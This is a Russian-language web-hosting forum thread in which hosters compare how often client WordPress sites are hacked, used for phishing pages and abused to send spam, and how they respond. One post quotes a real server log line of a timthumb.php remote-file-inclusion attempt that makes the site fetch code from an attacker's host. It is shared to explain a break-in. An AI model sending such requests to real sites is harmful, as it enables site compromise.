Проблемы хостеру от WordPress

12 3
bugsmoran
На сайте с 18.02.2010
Offline
223
2137

Народ, интересно мнение. Точнее критика: прав я или нет.

На протяжении примерно последнего года я заметил следующую особенность. Среди многих поводов общения с клиентами, есть три неприятных:

1) Взломали сайт. Восстановите мне из бэкапа

2) Пришла жалоба на фишинг

3) Пришла жалоба на спам

Казалось бы со всеми бывает. Если бы не одно странное совпадение: все 100% - WordPress.

Я не помню, чтобы клиенту взломали Joomla, DLE или MODx. Почему-то всегда WordPress. Вообще без исключений.

Спам. все без исключений случаи: wp-includes/class-phpmailer.php

Фишинг - опять же все до единого случаи с WordPress. Только там не вообще сайт, а какая-нибудь незаметная страничка посвящена банку.

У всех ли такая статистика или я ошибаюсь?

babiy
На сайте с 06.06.2009
Offline
56
#1

У нас например 70% WP и 30% DLE

Globatel.ru (http://globatel.ru) - надежные услуги на базе собственного ДЦ. Хостинг (http://globatel.ru/hosting/), VDS на базе KVM (http://globatel.ru/vps/), Dedicated (http://globatel.ru/dedicated/) ICQ 6485890, т. 8 (495) 706-49-49
bugsmoran
На сайте с 18.02.2010
Offline
223
#2

У моих клиентов почему-то DLE не пользуется популярностью, поэтому мало что про него знаю.

Ну ок, а что делаете с такими клиентами? Прогонять стыдно - они же не виноваты, что их ломают.

У меня уже начали появляться мысли запрета WordPress на хостинге. Чтобы не приходили даже - тогда и прогонять не придется.

P
На сайте с 28.04.2008
Offline
173
#3

Подтверждаю. Чаще всего WP ломают. Наша статистика 80% wp - 10% joomla и 10% DLE. Естественно всё приблизительно. А ломают потому что обновлять не умеют (не хотят) или пароли в фтп менеджере хранят. Но это вы и без меня знаете.

KVM vps на ssd дисках от 3.49$ O_o http://friendhosting.net/vps.php Отзывы о Friendhosting.net тут
KU
На сайте с 17.07.2008
Offline
251
#4

WP/Joomla примерно одинаково ломают.

В этом месяце вообще есть тренд на подбор пароля к админке CMS, и заливку шелла через нее.

bugsmoran:
Ну ок, а что делаете с такими клиентами? Прогонять стыдно - они же не виноваты, что их ломают.

Чекаем антивирусом и уведомляем клиентов до того как придет абуза.

Хостинг ( https://good-host.net ) / Linux VPS ( https://good-host.net/vps ) / Windows VPS ( https://good-host.net/windows-vps ) / Выделенные серверы ( https://good-host.net/dedicated ) 14 лет онлайн!
Den73
На сайте с 26.06.2010
Offline
523
#5
bugsmoran:
У моих клиентов почему-то DLE не пользуется популярностью, поэтому мало что про него знаю.
Ну ок, а что делаете с такими клиентами? Прогонять стыдно - они же не виноваты, что их ломают.

У меня уже начали появляться мысли запрета WordPress на хостинге. Чтобы не приходили даже - тогда и прогонять не придется.

а смысл гнать, вот недавно аналогично всплывал банковский фейк заныканный в wp, как раз таки они виноваты в том что не обновляют свои файлы, приходится помогать пинком в нужном направлении..

можно конечно и погнать если не предпринимают мер, за банковские фейки и сервер могут конфисковать запросто.

последний раз ломали через timthumb.php

112.215.36.175 - - [05/Nov/2012:07:32:57 +0400] "GET //wp-content/themes/cadabrapress/scripts/timthumb.php?src=http://flickr.com.slmseguros.es/content/png.php HTTP/1.1" 400 214 "-" "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20100101 Firefox/15.0.1"

я тут подумываю антивирус запустить в linux что бы хотя бы сигнализировал и удалял шеллы или написать скрипт который будет находить файлы в которых шифрованный код.

bugsmoran
На сайте с 18.02.2010
Offline
223
#6

Антивирус не могу себе позволить - сервер упадет. Там миллионы файлов.

А пиннать сотни людей - это ж мне придется жить только этим вопросом.

Den73
На сайте с 26.06.2010
Offline
523
#7
bugsmoran:
Антивирус не могу себе позволить - сервер упадет. Там миллионы файлов.
А пиннать сотни людей - это ж мне придется жить только этим вопросом.

ну вот по этой причине АВ пока не рискую поставить.

разве так часто ломают сайты? у нас конечно не 10к клиентов но 1.5к сайтов на наших серверах есть, я бы не сказал что абузят часто по факту взлома.

DT
На сайте с 28.11.2006
Offline
298
#8

Все по тихоньку. В зависимости как клиент своевременно отновляет свои скрипты. Мы например постоянно пишем людям и напоминаем о серьезных обновленях в популярных движках. А куда деваться - лучший способ защиты от всякой вредной ерунды - это профилактика.

Дешевый CloudLinux хостинг (http://www.provisov.net) много площадок в России, Франции, Украине, Германии, Нидерландах, США, Канаде. SSL-сертификат (https://www.provisov.net/blog/2016/10/26/besplatnyj-ssl-sertifikat-dlya-vsex-vashix-sajtov/) бесплатный и предустановленный для всех доменов
bugsmoran
На сайте с 18.02.2010
Offline
223
#9
Den73:
ну вот по этой причине АВ пока не рискую поставить.

разве так часто ломают сайты? у нас конечно не 10к клиентов но 1.5к сайтов на наших серверах есть, я бы не сказал что абузят часто по факту взлома.

Вот за сегодня три жалобы. Два сайта прикинулись банками, один разослал 700 писем спама (это еще ладно хоть ограничения на отсылку есть, а то бы вообще устроил переполох).

А жалобы не простые: от Hetzner. Сами понимаете, что будет, если задолбать хецнеровцев проблемами.

В общем-то я на абузы трачу существенное количество времени. Основная их проблема - их разрешение не автоматизируется никак. Мне бы конечно хотелось заняться более важными проблемами, чем трата по часу на споры с каждым абузным клиентом.

Нямкин
На сайте с 02.12.2010
Offline
65
#10
pavellift:
Подтверждаю. Чаще всего WP ломают. Наша статистика 80% wp - 10% joomla и 10% DLE.

Возможно, просто хостите 80% WP, 10% Джумлу и 10% ДЛЕ. Тогда к статистике это отношения не имеет.

pavellift:
А ломают потому что обновлять не умеют (не хотят) или пароли в фтп менеджере хранят.

А виноват в этом движок, да?

Ерунда. ВП менее дыряв, чем Джумла с ДЛЕ. Просто следить за обновлениями нужно и не наставлять плагинов неизвестных. Ну и общее - выставлять права на файлы, нормальные пароли с солью. Меня вон пытались ломать, ддосили, потом засыпали флудом так, что память ВПСки засирало за пару часов. И ничего, отстояла ВПшка. Не в движке дело, а в прокладке между стулом и клавиатурой.

Во какие картинки нашел:

12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий